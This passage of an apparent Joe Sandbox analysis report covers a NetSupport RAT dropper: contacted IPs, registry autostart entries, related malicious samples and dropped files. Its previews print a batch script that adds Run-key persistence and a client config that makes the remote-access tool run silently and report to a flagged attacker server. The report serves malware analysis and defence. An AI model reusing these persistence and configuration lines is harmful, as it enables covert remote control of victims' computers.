                                                http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                  		high
                                                  http://%s/testpage.htmbild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                    		high
                                                    http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                      		high
                                                      http://127.0.0.1bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                        		high
                                                        http://www.symauth.com/cps0(file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                          		high
                                                          http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            		high
                                                            http://%s/fakeurl.htmbild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              45.61.128.74
                                                              		unknownUnited States
                                                              		9009M247GBtrue
                                                              104.26.0.231
                                                              		geo.netsupportsoftware.comUnited States
                                                              		13335CLOUDFLARENETUSfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1556890
                                                              Start date and time:2024-11-16 12:40:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 54s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:10
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal88.rans.evad.winEXE@11/13@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 79%
                                                              • Number of executed functions: 187
                                                              • Number of non-executed functions: 186
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              06:41:34API Interceptor17730310x Sleep call for process: bild.exe modified
                                                              11:41:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe
                                                              11:41:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.26.0.231KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              geo.netsupportsoftware.comKC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • 104.26.0.231
                                                              KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • 104.26.0.231
                                                              72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                              • 172.67.68.212
                                                              hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.0.231
                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.1.231
                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.1.231
                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • 172.67.68.212
                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • 172.67.68.212
                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • 172.67.68.212
                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                              • 104.26.1.231

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              M247GByhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                              • 91.202.233.18
                                                              meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 38.201.237.116
                                                              botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 38.207.55.160
                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                              • 213.182.204.57
                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                              • 213.182.204.57
                                                              bin.sh.elfGet hashmaliciousMiraiBrowse
                                                              • 45.88.100.118
                                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 38.206.146.185
                                                              botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 173.211.86.154
                                                              qy8i3kM2Ir.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 172.111.244.104
                                                              Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                              • 141.98.102.187
                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.174.133
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 172.67.174.133
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.80.55
                                                              rSWIFT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.174.133
                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 172.64.41.3
                                                              https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fkese%2F7980321465/eW9vbmp1LmNob0Bib2xsb3JlLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.18.11.207
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.174.133
                                                              TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                              • 172.67.208.107
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.174.133

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\Public\Public\Videos\Video\HTCTL32.DLLKC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                            CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                              Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\Public\Public\Videos\Video\HTCTL32.DLL

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):328056
                                                                                  Entropy (8bit):6.754723001562745
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                  MD5:2D3B207C8A48148296156E5725426C7F
                                                                                  SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                  SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                  SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                  Joe Sandbox View:
                                                                                  • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                  • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\NSM.LIC

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):257
                                                                                  Entropy (8bit):5.119720931145611
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                  MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                  SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                  SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                  SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

                                                                                  C:\Users\Public\Public\Videos\Video\PCICHEK.DLL

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):18808
                                                                                  Entropy (8bit):6.22028391196942
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                  MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                  SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                  SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                  SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\PCICL32.DLL

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3735416
                                                                                  Entropy (8bit):6.525042992590476
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                  MD5:00587238D16012152C2E951A087F2CC9
                                                                                  SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                  SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                  SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                  • Antivirus: Virustotal, Detection: 17%, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\TCCTL32.DLL

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):396664
                                                                                  Entropy (8bit):6.809064783360712
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                  MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                  SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                  SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                  SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\bild.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):105848
                                                                                  Entropy (8bit):4.68250265552195
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                  MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                  SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                  SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                  • Antivirus: Virustotal, Detection: 49%, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\client32.ini

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):700
                                                                                  Entropy (8bit):5.533099732210104
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
                                                                                  MD5:5778ABD7CF2E8039239CD5982281D61A
                                                                                  SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
                                                                                  SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
                                                                                  SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
                                                                                  Malicious:false
                                                                                  Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

                                                                                  C:\Users\Public\Public\Videos\Video\msvcr100.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):773968
                                                                                  Entropy (8bit):6.901559811406837
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\netsup.bat

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):311
                                                                                  Entropy (8bit):5.308980069606459
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:hwszH1j0KpIAgidquHLNQ+bsWWNQ+bd83OG52LvVJ:HVj0Kprgidqunr2SP2hJ
                                                                                  MD5:4DB329A7BA03593C3D02C5E80068F82A
                                                                                  SHA1:70B77611F440DAC81778F54A316E811F3B3C63A4
                                                                                  SHA-256:7182655A9F8489E5B761C16192F3DE1662114F7AA9938F87E0062F8859DAE7F5
                                                                                  SHA-512:6B34FC8000A457F44BEFB03A8153D7E77CA0B8F44705AB7DF2FED3F52599A9172E9A866938986A36B4376C99260B5D03B5496DD605DBFBBD7BF301FE72D31F83
                                                                                  Malicious:true
                                                                                  Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Public\Videos\Video\bild.exe"..start %Public%\Public\Videos\Video\bild.exe..[HKEY_CURRENT_USER\Software\Supservice.."Supservice"="C:\\Program Files (x86)\\Supservice\\supservice.exe".."Version"="5"]..

                                                                                  C:\Users\Public\Public\Videos\Video\nskbfltr.inf

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:Windows setup INFormation
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):4.93007757242403
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                  Malicious:false
                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                  C:\Users\Public\Public\Videos\Video\pcicapi.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33144
                                                                                  Entropy (8bit):6.737780491933496
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                  MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                  SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                  SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
